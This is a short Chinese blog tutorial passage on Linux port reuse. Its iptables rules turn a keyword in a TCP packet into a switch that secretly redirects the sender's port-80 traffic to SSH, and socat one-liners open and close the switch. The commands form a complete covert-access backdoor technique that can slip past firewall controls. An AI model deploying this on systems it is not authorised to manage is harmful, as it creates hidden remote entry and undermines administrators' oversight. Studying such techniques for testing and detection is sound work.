方案四:(利用TCP协议做遥控开关)
利用 tcp 数据包中的关键字做遥控开关,不怕目标在内网。
iptables -t nat -N LETMEIN #创建端口复用链
iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22 #创建端口复用规则,将流量转发至 22 端口
iptables -A INPUT -p tcp -m string --string 'threathuntercoming' --algo bm -m recent --set --name letmein --rsource -j ACCEPT #开启开关,如果接收到一个含有threathuntercoming的TCP包,则将来源 IP 添加到加为letmein的列表中
iptables -A INPUT -p tcp -m string --string 'threathunterleaving' --algo bm -m recent --name letmein --remove -j ACCEPT #关闭开关,如果接收到一个含有threathunterleaving的TCP包,则将来源 IP 从letmein的列表中移除
iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN #如果发现 SYN 包的来源 IP 处于 letmein 列表中,将跳转到 LETMEIN 链进行处理,有效时间为 3600 秒
开启复用,开启后本机到目标 80 端口的流量将转发至目标的 SSH
echo threathuntercoming | socat - tcp:192.168.10.129:80
关闭复用,关闭后,80 恢复正常:
echo threathunterleaving | socat - tcp:192.168.10.129:80
来源:谢公子的博客
责编:凉粉
本文始发于微信公众号(安世加):技术干货|Linux利用iptables做端口复用
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论